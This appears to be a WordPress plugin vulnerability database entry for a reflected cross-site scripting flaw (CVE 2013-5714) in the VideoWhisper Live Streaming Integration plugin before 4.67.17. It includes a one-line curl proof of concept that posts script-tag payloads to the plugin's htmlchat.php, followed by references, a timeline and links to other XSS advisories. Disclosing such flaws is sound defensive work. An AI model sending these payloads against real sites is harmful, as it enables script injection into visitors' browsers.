VideoWhisper Live Streaming Integration < 4.67.17 – Reflected Cross-Site Scripting (XSS) | CVE 2013-5714 | Plugin Vulnerabilities

Description

The Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP WordPress plugin was affected by a Cross-Site Scripting (XSS) security vulnerability.

Proof of Concept

curl -X POST --data 'name=<script>alert(/XSS-name/)</script>&message=<script>alert(/XSS-message/)</script>' https://example.com/wp-content/plugins/videowhisper-live-streaming-integration/ls/htmlchat.php

Affects Plugins

videowhisper-live-streaming-integration

Fixed in 4.67.17

References

CVE

URL

https://seclists.org/bugtraq/2013/Aug/163

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Verified

No

WPVDB ID

c46ee4e9-1efb-48c4-8c0a-d352e55705fe

Timeline

Publicly Published

2013-08-23 (about 12 years ago)

Added

2014-08-01 (about 11 years ago)

Last Updated

2024-01-26 (about 2 years ago)

Other

Published

Title

Published

2025-01-18

Title

CarZine <= 1.4.6 - Reflected Cross-Site Scripting

Published

2023-08-02

Title

Woo Custom Emails <= 2.2 - Reflected XSS

Published

2026-03-06

Title

DA Media GigList <= 1.9.0 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'list_title' Shortcode Attribute

Published

2015-08-20

Title

Subscribe To Comments Reloaded < 150820 - Authenticated Reflected Cross-Site Scripting (XSS)

Published

2021-12-27

Title

Orders Tracking for WooCommerce < 1.1.10 - Reflected Cross-Site Scripting